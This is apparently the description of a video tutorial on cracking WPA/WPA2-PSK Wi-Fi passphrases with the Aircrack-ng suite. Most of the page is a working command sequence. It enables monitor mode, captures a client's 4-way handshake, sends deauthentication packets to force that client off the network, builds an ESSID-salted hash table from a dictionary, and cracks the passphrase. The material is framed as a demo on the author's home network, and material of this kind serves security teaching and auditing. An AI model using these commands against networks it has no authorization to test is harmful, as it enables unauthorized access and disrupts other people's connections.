Watch on-line:

What is this?
How to crack a wireless network using WPA/WPA2 (PSK/AES) encryption with a connected client (as both have same method!) . Then using a pre-computed hash table which has been "pre-salted" with the ESSID for the network to get the pass-phrase.

How does this work?
> Captures a 4-way handshake
> Creates a quick DoS (Denial of Service) attack at connected client to force them to disconnect and reconnect
> Apply a brute force dictionary attack to the handshake

What do I need?

> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power

Name: Aircrack-ng
Version: 1.0-rc3
Home Page:
Download Link:
airmon-ng start wlan0

airodump-ng mon0
airodump-ng --bssid 00:1B:9E:B2:60:00 -c 1 -w output mon0

aireplay-ng --deauth 10 -a 00:1B:9E:B2:60:00 -c 00:12:17:94:90:0D mon0

airolib-ng crackwpa --import passwd /root/tools/dictionaries/g0tmi1k.lst
kate ~/essid
airolib-ng crackwpa --import essid ~/essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all

aircrack-ng -r crackwpa output*.cap
This is cut from my final video called "g0tmi1k's home network".
There HAS to be a CONNECT client.
The pass-phrase HAS to be in the dictionary - so if you use something like, the chances of it being crack is next to nothing!

Song: Sub Focus - Rock It
Video length: 03:53
Capture length: 04:03

Blog Post:
Forum Post: